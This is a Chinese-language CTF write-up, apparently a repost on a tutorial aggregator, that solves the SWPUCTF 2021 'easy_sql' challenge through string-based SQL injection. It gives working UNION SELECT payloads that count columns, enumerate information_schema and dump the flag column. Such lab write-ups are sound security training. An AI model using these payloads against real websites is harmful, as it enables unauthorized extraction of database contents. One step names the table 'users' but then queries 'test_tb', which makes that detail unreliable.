字符型注入([SWPUCTF 2021 新生赛]easy_sql)

这篇具有很好参考价值的文章主要介绍了字符型注入([SWPUCTF 2021 新生赛]easy_sql)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

拿到题目,查看源码,可知是要输入参数wllm。

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

输入参数/?wllm=1,得到会显

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

继续输入参数/?wllm=1',报错,确定为字符型漏洞

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全1.查看字段列表,发现在字段4报错,确定为3列

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

2.查看回显

?wllm=-1' union select 1,2,3--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

3.查询数据库名(test_db)

?wllm=-1' union select 1,2,database()--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

4.查看test_db库的表(users)

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

5.查询字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

6.出现flag字段,查看flag字段的内容

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

字符型注入([SWPUCTF 2021 新生赛]easy_sql),sql,数据库,web安全,安全

出现flag字段,成功解出文章来源地址https://www.toymoban.com/news/detail-698756.html

到了这里,关于字符型注入([SWPUCTF 2021 新生赛]easy_sql)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Java字符串与字符型数组的转换

    通过本章可以了解到字符串与字符型数组之间相互转换的几种方法。 文章目录 一、字符串 —— 字符型数组  .toCharArray方法 .getChar方法 二、字符型数组 —— 字符串 .String方法 .copyValueOf方法         toCHarArray是将字符串中的一切字符均转换为字符数组。         用法为:字

    2024年02月15日
    浏览(45)
  • C语言整型转字符型和字符型转整型的简便且有效的方法(对于自然数)

    最近做到题目涉及数据类型的转换,查了很多资料,发现博客上的文章在此方面不全面,特别是在整型转成字符型上提供的方法不太好(指比较复杂),因此想做个总结。此方法主要涉及atoi,itoa和sprintf函数。 主要提供2种方法。 方法1:利用+‘0’将单个数字转字符 代码演示

    2024年02月15日
    浏览(41)
  • [SWPUCTF 2021 新生赛]PseudoProtocols

    base64解码可得 php://input 此方法需要前提条件,即开启 allow_url_include=On。 相当于一个远程包含的利用,php://打开文件流后,直接写入恶意代码。 data://text/plain, data://本身是数据流封装器,他们原理类似,input是POST,而data是GET

    2024年02月05日
    浏览(48)
  • [SWPUCTF 2021 新生赛]pop

    很明显了 反序列化 pop 构造pop链,主要还是 死盯 反序列化的魔法函数 从__destruct()入手,这里echo 可以调用到__toString __toString 调用 function Getflag() w44m类中两个变量并不是共有属性(关于属性文末有链接) private:是PHP中类的私有成员 protected:是PHP中类的保护成员 所以我们就直

    2024年02月06日
    浏览(42)
  • C++入门学习(十一)字符型

    C++中的字符型可以表示ASCII码中的所有字符,包括字母、数字、标点符号等。 ASCII码是一种用于编码字符的编码系统,它使用不同的数值来表示不同的字符。ASCII码使用7位或8位二进制数来表示每个字符,因此可以表示128或256个不同的字符。 在ASCII码中, 数字0-9的码值为30-39

    2024年01月22日
    浏览(42)
  • Java语言:字符型的详解、字符串的比较

    目录 前言 一.字符型的知识 二.字符型比较大小 三.字符串比较 equals()方法 equalslgnoreCase()方法 compareTo() 方法 🎁博主介绍:博客名为tq02,已学C语言、JavaSE,目前学了MySQL和JavaWeb 🎥学习专栏:  C语言         JavaSE       MySQL基础 🎄博主链接:tq02的博客_CSDN博客-C语言,Ja

    2024年02月13日
    浏览(69)
  • C语言常量(整型、实型、字符型、字符串、符号常量)

    对于C语言常量,该文章有详讲,由于文章太长,可参考如下思维导图和目录,可通过目录选择自己所需要的内容阅读。 整型常量即整数,包括正整数、负整数和零。C语言中,整型常量可以用十进制、八进制、和十六进制表示。 十进制表示: 由数字0-9,正、负号组成,如3

    2024年02月07日
    浏览(41)
  • [SWPUCTF 2021 新生赛]babyrce(详解)

    提示:没有提示 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 最近遇到的事太霉了,又是做到一半,靶机拒绝连接我,搞得我做题都不自信了 回到正文 题目 如下(示例):  看了一下,就是cookie值admin等于1时,就能包含文件,行吧,那就等于吧

    2024年02月06日
    浏览(40)
  • [SWPUCTF 2021 新生赛]ez_unserialize

    题目在哪呢?查看源代码试试 User-agent: * Disallow: 什么东西呢 发现disallow Robots 协议(也称为爬虫协议、机器人协议等)的全称是 “网络爬虫排除标准”(Robots Exclusion Protocol),网站通过 Robots 协议告诉搜索引擎哪些页面可抓,哪些页面不能抓。 disallow就是爬虫不能搜索的所以

    2024年02月05日
    浏览(38)
  • [SWPUCTF 2021 新生赛]easy_md5

    由于php中存在==的弱类型比较,所以我们可以通过hash比较的缺陷去绕过 比如: 也就是只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会现转换字符串的类型,在进行比较,而在比较是因为两个数都是以0e开头会被认为是科学计数法,0e后面

    2024年02月05日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包